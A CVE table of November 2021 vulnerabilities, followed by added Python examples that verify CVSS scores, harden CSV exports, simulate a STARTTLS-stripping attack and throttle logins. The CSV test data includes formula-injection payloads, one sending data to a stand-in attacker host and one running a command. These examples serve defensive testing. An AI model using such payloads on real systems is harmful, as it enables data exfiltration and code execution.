Score is the CVSS v2 base score; Access, Complexity, Authentication and the Conf./Integ./Avail. columns are its base metrics (Authentication "Single" is CVSS v2 Au:S, one login required; "Not required" is Au:N).

| # | CVE ID | CWE ID | # of Exploits | Vulnerability Type(s) | Publish Date | Update Date | Score (CVSS v2) | Gained Access Level | Access | Complexity | Authentication | Conf. | Integ. | Avail. | Description |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 601 | CVE-2021-38975 | 200 | | +Info | 2021-11-15 | 2021-11-16 | 4.0 | None | Remote | Low | Single | Partial | None | None | IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 could allow an authenticated user to obtain sensitive information from a specially crafted HTTP request. IBM X-Force ID: 212780. |
| 602 | CVE-2021-38974 | | | DoS | 2021-11-15 | 2021-11-16 | 4.0 | None | Remote | Low | Single | None | None | Partial | IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 could allow an authenticated user to cause a denial of service using specially crafted HTTP requests. IBM X-Force ID: 212779. |
| 603 | CVE-2021-38973 | 20 | | | 2021-11-12 | 2021-11-16 | 4.0 | None | Remote | Low | Single | None | Partial | None | IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 receives input or data but does not validate, or incorrectly validates, that the input has the properties required to process the data safely and correctly. |
| 604 | CVE-2021-38972 | 20 | | | 2021-11-12 | 2021-11-16 | 4.0 | None | Remote | Low | Single | None | Partial | None | IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 receives input or data but does not validate, or incorrectly validates, that the input has the properties required to process the data safely and correctly. |
| 605 | CVE-2021-38967 | 94 | | Exec Code | 2021-11-30 | 2021-11-30 | 4.6 | None | Local | Low | Not required | Partial | Partial | Partial | IBM MQ Appliance 9.2 CD and 9.2 LTS could allow a local privileged user to inject and execute malicious code. IBM X-Force ID: 212441. |
| 606 | CVE-2021-38959 | 787 | | DoS | 2021-11-17 | 2021-11-19 | 2.1 | None | Local | Low | Not required | None | None | Partial | IBM SPSS Statistics for Windows 24.0, 25.0, 26.0, 27.0, 27.0.1, and 28.0 could allow a local user to cause a denial of service by writing arbitrary files to admin-protected directories on the system. IBM X-Force ID: 212046. |
| 607 | CVE-2021-38958 | | | DoS | 2021-11-30 | 2021-11-30 | 2.1 | None | Local | Low | Not required | None | None | Partial | IBM MQ Appliance 9.2 CD and 9.2 LTS is affected by a denial of service attack caused by a concurrency issue. IBM X-Force ID: 212042. |
| 608 | CVE-2021-38949 | 312 | | | 2021-11-16 | 2021-11-17 | 2.1 | None | Local | Low | Not required | Partial | None | None | IBM MQ 7.5, 8.0, 9.0 LTS, 9.1 CD, and 9.1 LTS stores user credentials in clear text, which can be read by a local user. IBM X-Force ID: 211403. |
| 609 | CVE-2021-38948 | 91 | | | 2021-11-02 | 2021-11-03 | 6.4 | None | Remote | Low | Not required | Partial | None | Partial | IBM InfoSphere Information Server 11.7 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 211402. |
| 610 | CVE-2021-38891 | 326 | | | 2021-11-23 | 2021-11-29 | 5.0 | None | Remote | Low | Not required | Partial | None | None | IBM Sterling Connect:Direct Web Services 1.0 and 6.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 209508. |
| 611 | CVE-2021-38890 | 307 | | | 2021-11-23 | 2021-11-29 | 5.0 | None | Remote | Low | Not required | Partial | None | None | IBM Sterling Connect:Direct Web Services 1.0 and 6.0 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 209507. |
| 612 | CVE-2021-38887 | 200 | | +Info | 2021-11-10 | 2021-11-12 | 4.0 | None | Remote | Low | Single | Partial | None | None | IBM InfoSphere Information Server 11.7 could allow an authenticated user to obtain sensitive information from application responses that could be used in further attacks against the system. IBM X-Force ID: 209401. |
| 613 | CVE-2021-38882 | | | | 2021-11-16 | 2021-11-17 | 2.1 | None | Local | Low | Not required | None | Partial | None | IBM Spectrum Scale 5.1.0 through 5.1.1.1 could allow a privileged admin to destroy filesystem audit logging records before their expiration time. IBM X-Force ID: 209164. |
| 614 | CVE-2021-38875 | | | DoS | 2021-11-23 | 2021-11-24 | 4.0 | None | Remote | Low | Single | None | None | Partial | IBM MQ 8.0, 9.0 LTS, 9.1 LTS, 9.2 LTS, 9.1 CD, and 9.2 CD is vulnerable to a denial of service attack caused by an error processing messages. IBM X-Force ID: 208398. |
| 615 | CVE-2021-38873 | 74 | | Exec Code | 2021-11-24 | 2021-11-24 | 9.3 | None | Remote | Medium | Not required | Complete | Complete | Complete | IBM Planning Analytics 2.0 is potentially vulnerable to CSV injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of CSV file contents. IBM X-Force ID: 208396. |
| 616 | CVE-2021-38847 | 434 | | Exec Code | 2021-11-01 | 2021-11-02 | 6.5 | None | Remote | Low | Single | Partial | Partial | Partial | S-Cart v6.4.1 and below was discovered to contain an arbitrary file upload vulnerability in the Editor module of the Admin panel. This vulnerability allows attackers to execute arbitrary code via a crafted IMG file. |
| 617 | CVE-2021-38686 | 287 | | | 2021-11-26 | 2021-12-03 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial | An improper authentication vulnerability has been reported to affect QNAP VioStor devices. If exploited, this vulnerability allows attackers to compromise the security of the system. We have already fixed this vulnerability in the following versions of QVR: QVR FW 5.1.6 build 20211109 and later. |
| 618 | CVE-2021-38685 | 78 | | | 2021-11-26 | 2021-12-02 | 7.5 | None | Remote | Low | Not required | Partial | Partial | Partial | A command injection vulnerability has been reported to affect QNAP VioStor devices. If exploited, this vulnerability allows remote attackers to run arbitrary commands. We have already fixed this vulnerability in the following versions of QVR: QVR FW 5.1.6 build 20211109 and later. |
| 619 | CVE-2021-38684 | 787 | | Exec Code Overflow | 2021-11-13 | 2022-02-10 | 7.5 | None | Remote | Low | Not required | Partial | Partial | Partial | A stack buffer overflow vulnerability has been reported to affect QNAP NAS running Multimedia Console. If exploited, this vulnerability allows attackers to execute arbitrary code. We have already fixed this vulnerability in the following versions of Multimedia Console: Multimedia Console 1.4.3 (2021/10/05) and later; Multimedia Console 1.5.3 (2021/10/05) and later. |
| 620 | CVE-2021-38681 | 79 | | XSS | 2021-11-20 | 2021-11-23 | 4.3 | None | Remote | Medium | Not required | None | Partial | None | A reflected cross-site scripting (XSS) vulnerability has been reported to affect QNAP NAS running Ragic Cloud DB. If exploited, this vulnerability allows remote attackers to inject malicious code. QNAP has already disabled and removed Ragic Cloud DB from the QNAP App Center, pending a security patch from Ragic. |
| 621 | CVE-2021-38666 | | | Exec Code | 2021-11-10 | 2021-11-10 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial | Remote Desktop Client Remote Code Execution Vulnerability |
| 622 | CVE-2021-38665 | | | | 2021-11-10 | 2021-11-10 | 4.3 | None | Remote | Medium | Not required | Partial | None | None | Remote Desktop Protocol Client Information Disclosure Vulnerability |
| 623 | CVE-2021-38631 | | | | 2021-11-10 | 2021-11-12 | 2.1 | None | Local | Low | Not required | Partial | None | None | Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability. This CVE ID is unique from CVE-2021-41371. |
| 624 | CVE-2021-38502 | 522 | | Exec Code | 2021-11-03 | 2022-03-17 | 4.3 | None | Remote | Medium | Not required | Partial | None | None | Thunderbird ignored the configuration to require STARTTLS security for an SMTP connection. A MITM could perform a downgrade attack to intercept transmitted messages, or could take control of the authenticated session to execute SMTP commands chosen by the MITM. If an unprotected authentication method was configured, the MITM could obtain the authentication credentials, too. This vulnerability affects Thunderbird < 91.2. |
| 625 | CVE-2021-38501 | | | Mem. Corr. | 2021-11-03 | 2021-11-04 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial | Mozilla developers reported memory safety bugs present in Firefox 92 and Firefox ESR 91.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 93, Thunderbird < 91.2, and Firefox ESR < 91.2. |
| 626 | CVE-2021-38500 | | | Mem. Corr. | 2021-11-03 | 2022-03-17 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial | Mozilla developers reported memory safety bugs present in Firefox 92 and Firefox ESR 91.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird < 78.15, Thunderbird < 91.2, Firefox ESR < 91.2, Firefox ESR < 78.15, and Firefox < 93. |
| 627 | CVE-2021-38499 | 787 | | Mem. Corr. | 2021-11-03 | 2022-05-03 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial | Mozilla developers reported memory safety bugs present in Firefox 92. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 93. |
| 628 | CVE-2021-38498 | 416 | | Mem. Corr. | 2021-11-03 | 2021-11-04 | 5.0 | None | Remote | Low | Not required | None | None | Partial | During process shutdown, a document could have caused a use-after-free of a languages service object, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox < 93, Thunderbird < 91.2, and Firefox ESR < 91.2. |
| 629 | CVE-2021-38497 | 346 | | | 2021-11-03 | 2021-11-04 | 4.3 | None | Remote | Medium | Not required | None | Partial | None | Through use of reportValidity() and window.open(), a plain-text validation message could have been overlaid on another origin, leading to possible user confusion and spoofing attacks. This vulnerability affects Firefox < 93, Thunderbird < 91.2, and Firefox ESR < 91.2. |
| 630 | CVE-2021-38496 | 416 | | Mem. Corr. | 2021-11-03 | 2022-03-17 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial | During operations on MessageTasks, a task may have been removed while it was still scheduled, resulting in memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 78.15, Thunderbird < 91.2, Firefox ESR < 91.2, Firefox ESR < 78.15, and Firefox < 93. |
| 631 | CVE-2021-38495 | 787 | | Mem. Corr. | 2021-11-03 | 2022-05-03 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial | Mozilla developers reported memory safety bugs present in Thunderbird 78.13.0. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird < 91.1 and Firefox ESR < 91.1. |
| 632 | CVE-2021-38494 | 787 | | Mem. Corr. | 2021-11-03 | 2022-05-03 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial | Mozilla developers reported memory safety bugs present in Firefox 91. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 92. |
| 633 | CVE-2021-38493 | 787 | | Mem. Corr. | 2021-11-03 | 2022-05-03 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial | Mozilla developers reported memory safety bugs present in Firefox 91 and Firefox ESR 78.13. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 78.14, Thunderbird < 78.14, and Firefox < 92. |
| 634 | CVE-2021-38492 | | | | 2021-11-03 | 2021-11-04 | 4.3 | None | Remote | Medium | Not required | None | Partial | None | When delegating navigations to the operating system, Firefox would accept the `mk` scheme, which might allow attackers to launch pages and execute scripts in Internet Explorer in unprivileged mode. *This bug only affects Firefox for Windows. Other operating systems are unaffected.* This vulnerability affects Firefox < 92, Thunderbird < 91.1, Thunderbird < 78.14, Firefox ESR < 78.14, and Firefox ESR < 91.1. |
| 635 | CVE-2021-38491 | | | | 2021-11-03 | 2022-03-16 | 4.3 | None | Remote | Medium | Not required | None | Partial | None | Mixed-content checks were unable to analyze opaque origins, which led to some mixed content being loaded. This vulnerability affects Firefox < 92. |
| 636 | CVE-2021-38488 | 79 | | Exec Code XSS | 2021-11-03 | 2021-11-05 | 3.5 | None | Remote | Medium | Single | None | Partial | None | Delta Electronics DIALink versions 1.2.4.0 and prior are vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the `comment` parameter of the `events` API, which may allow an attacker to remotely execute code. |
| 637 | CVE-2021-38448 | 94 | | | 2021-11-22 | 2022-05-10 | 4.6 | None | Local | Low | Not required | Partial | Partial | Partial | The affected controllers do not properly sanitize input containing code syntax. As a result, an attacker could craft code to alter the intended controller flow of the software. |
| 638 | CVE-2021-38428 | 79 | | Exec Code XSS | 2021-11-03 | 2021-11-05 | 3.5 | None | Remote | Medium | Single | None | Partial | None | Delta Electronics DIALink versions 1.2.4.0 and prior are vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the `name` parameter of the `schedule` API, which may allow an attacker to remotely execute code. |
| 639 | CVE-2021-38424 | 1236 | | | 2021-11-03 | 2021-11-05 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial | The tag interface of Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to an attacker injecting formulas into the tag data. Those formulas may then be executed when the data is opened with a spreadsheet application. |
| 640 | CVE-2021-38422 | 312 | | | 2021-11-03 | 2021-11-05 | 4.6 | None | Local | Low | Not required | Partial | Partial | Partial | Delta Electronics DIALink versions 1.2.4.0 and prior store sensitive information in cleartext, which may allow an attacker to gain extensive access to the application directory and escalate privileges. |
| 641 | CVE-2021-38420 | 276 | | | 2021-11-03 | 2021-11-05 | 4.6 | None | Local | Low | Not required | Partial | Partial | Partial | Delta Electronics DIALink versions 1.2.4.0 and prior grant extensive default permissions to low-privileged user accounts, which may allow an attacker to modify the installation directory and upload malicious files. |
| 642 | CVE-2021-38418 | 319 | | | 2021-11-03 | 2021-11-05 | 4.3 | None | Remote | Medium | Not required | Partial | None | None | Delta Electronics DIALink versions 1.2.4.0 and prior run by default on HTTP, which may allow an attacker positioned between the endpoints to perform a machine-in-the-middle attack and access information without authorization. |
| 643 | CVE-2021-38416 | 427 | | | 2021-11-03 | 2021-11-05 | 4.4 | None | Local | Medium | Not required | Partial | Partial | Partial | Delta Electronics DIALink versions 1.2.4.0 and prior insecurely load libraries, which may allow an attacker to use DLL hijacking and take over the system where the software is installed. |
| 644 | CVE-2021-38411 | 79 | | Exec Code XSS | 2021-11-03 | 2021-11-05 | 3.5 | None | Remote | Medium | Single | None | Partial | None | Delta Electronics DIALink versions 1.2.4.0 and prior are vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the `deviceName` parameter of the `modbusWriter-Reader` API, which may allow an attacker to remotely execute code. |
| 645 | CVE-2021-38407 | 79 | | Exec Code XSS | 2021-11-03 | 2021-11-05 | 3.5 | None | Remote | Medium | Single | None | Partial | None | Delta Electronics DIALink versions 1.2.4.0 and prior are vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the `name` parameter of the `devices` API, which may allow an attacker to remotely execute code. |
| 646 | CVE-2021-38403 | 79 | | Exec Code XSS | 2021-11-03 | 2021-11-05 | 3.5 | None | Remote | Medium | Single | None | Partial | None | Delta Electronics DIALink versions 1.2.4.0 and prior are vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the `supplier` parameter of the `maintenance` API, which may allow an attacker to remotely execute code. |
| 647 | CVE-2021-38378 | 668 | | | 2021-11-22 | 2021-11-23 | 4.0 | None | Remote | Low | Single | Partial | None | None | OX App Suite 7.10.5 allows information exposure because a caching mechanism can cause a "Modified By" response to show a person's name. |
| 648 | CVE-2021-38377 | 79 | | XSS | 2021-11-22 | 2021-11-23 | 4.3 | None | Remote | Medium | Not required | None | Partial | None | OX App Suite through 7.10.5 allows XSS via JavaScript code in an anchor HTML comment within a truncated e-mail, because there is a predictable UUID in the HTML transformation results. |
| 649 | CVE-2021-38376 | 668 | | | 2021-11-22 | 2021-11-23 | 5.0 | None | Remote | Low | Not required | Partial | None | None | OX App Suite through 7.10.5 has incorrect access control for retrieval of session information via the rampup action of the login API call. |
| 650 | CVE-2021-38375 | 79 | | XSS | 2021-11-22 | 2021-11-23 | 4.3 | None | Remote | Medium | Not required | None | Partial | None | OX App Suite through 7.10.5 allows XSS via the alt attribute of an IMG element in a truncated e-mail message. |
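The Score column in the listing above is a CVSS v2 base score, and the Access, Complexity, Authentication and Conf./Integ./Avail. columns are exactly the inputs to the v2 base equation, so every row can be checked arithmetically. The block below is an added example, not code from the vulnerability database or from any vendor in the table: it recomputes the score for a constructed subset of the rows (one per distinct metric combination) and renders the equivalent vector string. It also settles what the Authentication value that some extractions of this listing print as `???` stands for: only the single-authentication weight (`Au:S`, "Single") reproduces the 4.0, 6.5 and 3.5 scores on the rows whose descriptions require an authenticated user. `ROWS`, `check_rows` and `score_under_each_auth` are this example's own names.

```python
"""Recompute the CVSS v2 base scores in the table above from its metric columns.

Added example, not code from the vulnerability database page. The weights are
the CVSS v2.0 base-equation constants; ROWS is a constructed subset of the
table, one entry per distinct metric combination that appears in it.
"""
from decimal import Decimal, ROUND_HALF_UP

# Metric weights from the CVSS v2.0 specification, keyed by the table's column values.
ACCESS_VECTOR = {"Local": 0.395, "Adjacent": 0.646, "Remote": 1.0}          # AV:L AV:A AV:N
ACCESS_COMPLEXITY = {"High": 0.35, "Medium": 0.61, "Low": 0.71}             # AC:H AC:M AC:L
AUTHENTICATION = {"Multiple": 0.45, "Single": 0.56, "Not required": 0.704}  # Au:M Au:S Au:N
IMPACT = {"None": 0.0, "Partial": 0.275, "Complete": 0.660}                 # C/I/A: N P C

VECTOR_LETTER = {"Local": "L", "Adjacent": "A", "Remote": "N", "High": "H", "Medium": "M",
                 "Low": "L", "Multiple": "M", "Single": "S", "Not required": "N",
                 "None": "N", "Partial": "P", "Complete": "C"}


def cvss2_base_score(access, complexity, auth, conf, integ, avail):
    """CVSS v2 base equation, rounded half-up to one decimal as the specification requires."""
    impact = 10.41 * (1 - (1 - IMPACT[conf]) * (1 - IMPACT[integ]) * (1 - IMPACT[avail]))
    if impact == 0:  # f(Impact) is 0 when no impact metric is set, so the score is 0
        return 0.0
    exploitability = 20 * ACCESS_VECTOR[access] * ACCESS_COMPLEXITY[complexity] * AUTHENTICATION[auth]
    raw = ((0.6 * impact) + (0.4 * exploitability) - 1.5) * 1.176
    return float(Decimal(repr(raw)).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def cvss2_vector(access, complexity, auth, conf, integ, avail):
    """Render the six table columns as the equivalent CVSS v2 vector string."""
    letters = [VECTOR_LETTER[v] for v in (access, complexity, auth, conf, integ, avail)]
    return "AV:{}/AC:{}/Au:{}/C:{}/I:{}/A:{}".format(*letters)


def score_under_each_auth(access, complexity, conf, integ, avail):
    """Score one row under every Authentication value; the value that reproduces the
    published score is what the listing's Authentication column stands for."""
    return {auth: cvss2_base_score(access, complexity, auth, conf, integ, avail)
            for auth in AUTHENTICATION}


# Constructed subset of the table above: (CVE, published score, Access, Complexity,
# Authentication, Conf., Integ., Avail.). Rows printed as "???" in the source use "Single".
ROWS = [
    ("CVE-2021-38975", 4.0, "Remote", "Low", "Single", "Partial", "None", "None"),
    ("CVE-2021-38967", 4.6, "Local", "Low", "Not required", "Partial", "Partial", "Partial"),
    ("CVE-2021-38959", 2.1, "Local", "Low", "Not required", "None", "None", "Partial"),
    ("CVE-2021-38948", 6.4, "Remote", "Low", "Not required", "Partial", "None", "Partial"),
    ("CVE-2021-38891", 5.0, "Remote", "Low", "Not required", "Partial", "None", "None"),
    ("CVE-2021-38873", 9.3, "Remote", "Medium", "Not required", "Complete", "Complete", "Complete"),
    ("CVE-2021-38847", 6.5, "Remote", "Low", "Single", "Partial", "Partial", "Partial"),
    ("CVE-2021-38686", 6.8, "Remote", "Medium", "Not required", "Partial", "Partial", "Partial"),
    ("CVE-2021-38685", 7.5, "Remote", "Low", "Not required", "Partial", "Partial", "Partial"),
    ("CVE-2021-38681", 4.3, "Remote", "Medium", "Not required", "None", "Partial", "None"),
    ("CVE-2021-38488", 3.5, "Remote", "Medium", "Single", "None", "Partial", "None"),
    ("CVE-2021-38416", 4.4, "Local", "Medium", "Not required", "Partial", "Partial", "Partial"),
]


def check_rows(rows=ROWS):
    """Return (cve, published, recomputed, vector) for rows whose score does not reproduce."""
    mismatches = []
    for cve, published, *metrics in rows:
        recomputed = cvss2_base_score(*metrics)
        if recomputed != published:
            mismatches.append((cve, published, recomputed, cvss2_vector(*metrics)))
    return mismatches


if __name__ == "__main__":
    for cve, published, *metrics in ROWS:
        print(cve, published, cvss2_base_score(*metrics), cvss2_vector(*metrics))
    print("mismatches:", check_rows())
```

`score_under_each_auth("Remote", "Low", "Partial", "None", "None")` gives 3.3 for Multiple, 4.0 for Single and 5.0 for Not required, so a 4.0 on a remote, low-complexity, confidentiality-only row can only be `Au:S`. The same arithmetic is a quick sanity check when a tracker's score and vector disagree after an update.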
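CVE-2021-38873 (IBM Planning Analytics, CWE-74) and CVE-2021-38424 (Delta DIALink tag interface, CWE-1236) are the same bug class: text that reaches a CSV export is later evaluated as a formula by the spreadsheet that opens the file. The block below is an added example, not code from either product; it shows the vulnerable export pattern beside a hardened one and runs both over a constructed set of "tag" records that mix benign values with generic CSV-injection test strings.

```python
"""Neutralise spreadsheet formula injection (CWE-1236) in CSV exports.

Added example, not code from IBM Planning Analytics or Delta DIALink. The tag
records below are constructed test data and the formula strings are generic
CSV-injection test payloads, not content taken from either product.
"""
import csv
import io

# Leading characters that Excel, LibreOffice and Google Sheets interpret as the start
# of a formula (tab and carriage return are included because they can precede one).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    """True when a spreadsheet would evaluate this cell instead of displaying it.
    Leading spaces are ignored so the check errs on the side of flagging."""
    return isinstance(value, str) and value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Make one cell text-only. Strings that look like formulas get a leading
    apostrophe, which spreadsheets treat as a literal-text marker. Non-string
    values (numbers, None) pass through unchanged, so emit numeric columns as
    numbers rather than strings to avoid defanging legitimate negatives."""
    if is_formula_like(value):
        return "'" + value
    return value


def unsafe_csv(rows, header):
    """The pattern behind CSV injection: cell contents written exactly as submitted."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(header)
    writer.writerows(rows)
    return buf.getvalue()


def safe_csv(rows, header):
    """Hardened export: every cell neutralised and every field double-quoted, so a
    cell cannot start a new field or record either."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def exported_cells_are_text(csv_text):
    """Parse an export back and confirm no cell would be evaluated as a formula."""
    return all(not is_formula_like(cell)
               for row in csv.reader(io.StringIO(csv_text)) for cell in row)


# Constructed sample: tag records as an attacker could submit them through a
# free-text tag field, mixed with benign entries.
HEADER = ("tag", "description")
SAMPLE_TAGS = [
    ("temp_sensor_01", "Boiler room temperature"),
    ("pump_02", '=HYPERLINK("http://attacker.invalid/?d="&A1,"open")'),
    ("valve_03", "\t=cmd|' /C calc'!A0"),
    ("flow_04", "-12.5"),
    ("level_05", "@SUM(A1:A4)"),
]

if __name__ == "__main__":
    print(unsafe_csv(SAMPLE_TAGS, HEADER))
    print(safe_csv(SAMPLE_TAGS, HEADER))
```

The apostrophe prefix is the OWASP-recommended mitigation and is visible to the user in the spreadsheet, which is the accepted trade-off; the `-12.5` row shows why numeric columns should be passed as numbers rather than strings, since a string that merely starts with a minus sign is indistinguishable from a formula at export time.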
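CVE-2021-38502 is a policy-enforcement bug rather than a protocol bug: the require-STARTTLS setting existed, but an on-path attacker who stripped the STARTTLS capability from the EHLO reply could still get the client to authenticate in plaintext. The block below is an added example, not Thunderbird code; it scripts both ends of the SMTP exchange in-process (no sockets, no real TLS handshake) with a constructed hostname and credential, and contrasts a client that honours the setting with one that reads it and ignores it.

```python
"""Enforce a "require STARTTLS" SMTP setting against a capability-stripping MITM.

Added example of the bug class behind CVE-2021-38502 (a client that reads its
require-STARTTLS preference but does not act on it). It is not Thunderbird
code. Both SMTP endpoints are scripted in-process, without sockets or a real
TLS handshake; the hostnames and the AUTH PLAIN credential are constructed.
"""
import base64


class ScriptedSmtpServer:
    """Minimal ESMTP responder supporting EHLO, STARTTLS, AUTH PLAIN and QUIT."""

    def __init__(self, hostname="mail.example.invalid", supports_starttls=True):
        self.hostname = hostname
        self.supports_starttls = supports_starttls
        self.tls_active = False
        self.plaintext_auth_seen = None  # AUTH token that arrived on an unencrypted channel

    def greeting(self):
        return "220 %s ESMTP ready" % self.hostname

    def handle(self, line):
        verb = line.split(" ", 1)[0].upper()
        if verb == "EHLO":
            reply = ["250-%s" % self.hostname, "250-AUTH PLAIN LOGIN"]
            if self.supports_starttls and not self.tls_active:
                reply.append("250-STARTTLS")
            reply.append("250 8BITMIME")
            return reply
        if verb == "STARTTLS":
            if not self.supports_starttls or self.tls_active:
                return ["454 TLS not available"]
            self.tls_active = True  # handshake elided: from here on the channel is encrypted
            return ["220 Ready to start TLS"]
        if verb == "AUTH":
            if not self.tls_active:
                self.plaintext_auth_seen = line.split(" ", 2)[2]
            return ["235 Authentication successful"]
        if verb == "QUIT":
            return ["221 Bye"]
        return ["500 Unrecognised command"]


class StripStarttlsMitm:
    """Active attacker on the path: relays traffic, deletes the STARTTLS capability
    from the EHLO reply, refuses STARTTLS itself, and records any AUTH it relays."""

    def __init__(self, upstream):
        self.upstream = upstream
        self.captured_auth = None

    def greeting(self):
        return self.upstream.greeting()

    def handle(self, line):
        verb = line.split(" ", 1)[0].upper()
        if verb == "STARTTLS":
            return ["454 TLS not available"]
        if verb == "AUTH":
            self.captured_auth = line.split(" ", 2)[2]
        reply = self.upstream.handle(line)
        return [l for l in reply if not l[4:].upper().startswith("STARTTLS")]


def parse_ehlo(reply):
    """Capability keywords from a multi-line 250 reply (the first line is the hostname)."""
    return {l[4:].split(" ")[0].upper() for l in reply[1:] if l.startswith("250")}


def smtp_login(server, require_starttls, honor_setting=True, user="alice", password="s3cret"):
    """Client side. honor_setting=False reproduces the vulnerable behaviour: the
    require-STARTTLS setting is present but ignored, so AUTH proceeds in clear."""
    transcript = [("S", server.greeting())]

    def send(cmd):
        transcript.append(("C", cmd))
        reply = server.handle(cmd)
        transcript.extend(("S", l) for l in reply)
        return reply

    caps = parse_ehlo(send("EHLO client.example.invalid"))
    secured = False
    if "STARTTLS" in caps and send("STARTTLS")[0].startswith("220"):
        secured = True
        caps = parse_ehlo(send("EHLO client.example.invalid"))  # RFC 3207: re-EHLO after TLS
    if require_starttls and honor_setting and not secured:
        send("QUIT")  # refuse to continue; in particular, never send credentials
        return {"secured": False, "authenticated": False, "aborted": True, "transcript": transcript}
    token = base64.b64encode(("\0%s\0%s" % (user, password)).encode()).decode()
    authenticated = send("AUTH PLAIN " + token)[0].startswith("235")
    send("QUIT")
    return {"secured": secured, "authenticated": authenticated, "aborted": False,
            "transcript": transcript}


def decode_auth_plain(token):
    """What an on-path attacker recovers from a captured AUTH PLAIN token."""
    _, user, password = base64.b64decode(token).decode().split("\0")
    return user, password
```

The decisive line is the check on `secured` before any AUTH is sent: a client that merely prefers STARTTLS will fall through to plaintext when the capability is missing, which is exactly the downgrade the CVE describes. The returned transcript lists both sides' messages so the two behaviours can be diffed.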
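CVE-2021-38890 (CWE-307) is an inadequate account lockout setting. The block below is an added example, not code from IBM Sterling Connect:Direct Web Services, of the two controls a login endpoint needs together: a per-account lock after a handful of failures, and a per-source cap so that one client cannot spray a few guesses across many accounts while staying under every account's threshold. Account names, thresholds, the source address and the wordlist are constructed, and time is passed in explicitly so the policy runs without sleeping.

```python
"""Login throttling for a web service (CWE-307), per account and per source.

Added example, not code from IBM Sterling Connect:Direct Web Services. The
thresholds, account names, source address and wordlist are constructed; time
is passed in explicitly so the policy can be exercised without sleeping.
"""
from collections import defaultdict, deque


class LoginThrottle:
    """Lock an account after max_failures failed attempts within window_seconds, and
    cap attempts per source address in the same window. The per-source cap is what
    limits password spraying across many accounts; the lockout alone does not."""

    def __init__(self, max_failures=5, window_seconds=300, lockout_seconds=900, max_per_source=20):
        self.max_failures = max_failures
        self.window = window_seconds
        self.lockout = lockout_seconds
        self.max_per_source = max_per_source
        self.failures = defaultdict(deque)         # account -> timestamps of recent failures
        self.locked_until = {}                     # account -> time the lock expires
        self.source_attempts = defaultdict(deque)  # source -> timestamps of recent attempts

    def _prune(self, timestamps, now):
        while timestamps and now - timestamps[0] > self.window:
            timestamps.popleft()

    def attempt(self, account, source, password_ok, now):
        """Evaluate one login attempt. Returns 'ok', 'bad-password', 'locked' or
        'source-throttled'. The caller must treat 'locked' identically for right and
        wrong passwords, otherwise the lock becomes a password oracle."""
        per_source = self.source_attempts[source]
        self._prune(per_source, now)
        if len(per_source) >= self.max_per_source:
            return "source-throttled"
        per_source.append(now)

        until = self.locked_until.get(account)
        if until is not None and now < until:
            return "locked"

        if password_ok:
            self.failures[account].clear()
            return "ok"
        recent = self.failures[account]
        self._prune(recent, now)
        recent.append(now)
        if len(recent) >= self.max_failures:
            self.locked_until[account] = now + self.lockout
            recent.clear()
        return "bad-password"


def simulate_bruteforce(throttle, account, wordlist, real_password,
                        source="198.51.100.7", start=0.0, interval=0.5):
    """Try a wordlist against one account. Returns (outcomes, cracked)."""
    outcomes = []
    for i, guess in enumerate(wordlist):
        result = throttle.attempt(account, source, guess == real_password, start + i * interval)
        outcomes.append(result)
        if result == "ok":
            return outcomes, True
    return outcomes, False


# Constructed wordlist; the real password is the last entry so the lock engages first.
WORDLIST = ["123456", "password", "qwerty", "letmein", "admin", "s3cret!"]

if __name__ == "__main__":
    print(simulate_bruteforce(LoginThrottle(), "alice", WORDLIST, "s3cret!"))
    print(simulate_bruteforce(LoginThrottle(max_failures=10**6), "alice", WORDLIST, "s3cret!"))
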